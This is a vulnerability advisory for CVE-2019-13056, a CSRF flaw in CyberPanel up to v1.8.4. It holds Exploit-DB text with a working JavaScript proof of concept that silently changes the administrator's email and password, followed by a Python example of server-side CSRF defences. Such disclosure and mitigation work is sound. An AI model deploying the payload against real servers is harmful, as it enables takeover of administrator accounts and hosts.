Vendor: CyberPanel
By: Bilgi Birikim Sistemleri
CVSS: 8.8 (HIGH)
Vulnerability Type: Account Takeover
CWE: 352
Product Name: CyberPanel
Affected Version From: v1.8.4
Affected Version To: v1.8.4
Patch Exists: YES
Related CVE: CVE-2019-13056
CPE: a:cyberpanel:cyberpanel
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
Year: 2019

CyberPanel Administrator Account Takeover <= v1.8.4

A CSRF vulnerability in CyberPanel lets an attacker change the administrator's credentials, such as the e-mail address and password, and then log in to the administration panel and take over the server.

Mitigation:

Implement CSRF protection on state-changing requests and validate user input.

Exploit-DB raw data:

# Title: CyberPanel Administrator Account Takeover <= v1.8.4
# Date: 30.06.2019
# Author: Bilgi Birikim Sistemleri
# Vendor Homepage: https://cyberpanel.net/
# Version: Up to v1.8.4.
# CVE: CVE-2019-13056
# mturkyilmaz@bilgibirikim.com & bilgibirikim.com

# Description:
# Attacker can edit administrator's credentials like email, password.
# Then, access the administration panel and take over the server.
# A CSRF vulnerability.

# How to Reproduce:
# Attacker will create a website,
# CyberPanel administrator will visit that website,
# Administrator's e-mail and password will be changed automatically.

# PoC:
<script>
fetch('https://SERVERIP:8090/users/saveModifications', {method: 'POST', credentials: 'include', headers: {'Content-Type': 'text/plain'}, body: '{"accountUsername":"admin","firstName":"CSRF","lastName":"Vulnerable","email":"attackersemail@example.org","password":"attackerspassword"}'});
</script>
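As an added example (not CyberPanel's own code), the mitigation named above applied to the exact request shape of the PoC: a server-side check that rejects the cross-site text/plain POST and accepts only a same-origin, token-bearing JSON request with known fields. The origin, token, header name `X-CSRF-Token`, the `check_state_change` function and the sample request are all constructed for this illustration.

```python
import hmac
import json
from urllib.parse import urlsplit

# Constructed values for this example: a real panel derives the token per
# session and takes its own origin from configuration.
PANEL_ORIGIN = "https://panel.example.org:8090"
SESSION_CSRF_TOKEN = "session-bound-token-c0ffee"
ALLOWED_FIELDS = {"accountUsername", "firstName", "lastName", "email", "password"}


def _same_origin(headers):
    """True if Origin (or Referer as fallback) has the panel's scheme and host:port."""
    src = headers.get("origin") or headers.get("referer")
    if not src:
        return False
    s, p = urlsplit(src), urlsplit(PANEL_ORIGIN)
    return (s.scheme, s.netloc) == (p.scheme, p.netloc)


def check_state_change(headers, body):
    """Return (allowed, reason) for a POST to an endpoint like /users/saveModifications.
    Each layer alone defeats the PoC above; together they are defense in depth:
      1. Origin/Referer must be the panel itself; a cross-site page cannot forge it.
      2. A session-bound token must arrive in a custom header, which a cross-site
         page can neither read nor send without a CORS preflight.
      3. Only application/json is accepted; the PoC's text/plain POST is a CORS
         "simple request" that skips preflight, so it is refused outright.
      4. The decoded body is validated field by field before any update.
    """
    headers = {k.lower(): v for k, v in headers.items()}
    if not _same_origin(headers):
        return False, "origin mismatch"
    token = headers.get("x-csrf-token", "").encode()
    if not hmac.compare_digest(token, SESSION_CSRF_TOKEN.encode()):
        return False, "missing or invalid CSRF token"
    if headers.get("content-type", "").split(";")[0].strip() != "application/json":
        return False, "unexpected content type"
    try:
        data = json.loads(body)
    except ValueError:
        return False, "malformed JSON"
    if not isinstance(data, dict) or set(data) - ALLOWED_FIELDS:
        return False, "unexpected fields"
    if not all(isinstance(v, str) for v in data.values()):
        return False, "fields must be strings"
    return True, "ok"


# Constructed view of the PoC's request: the browser adds the attacking page's
# Origin and the session cookie, but no CSRF header.
POC_HEADERS = {"Origin": "https://attacker.example", "Content-Type": "text/plain"}
POC_BODY = '{"accountUsername":"admin","email":"attackersemail@example.org","password":"x"}'
```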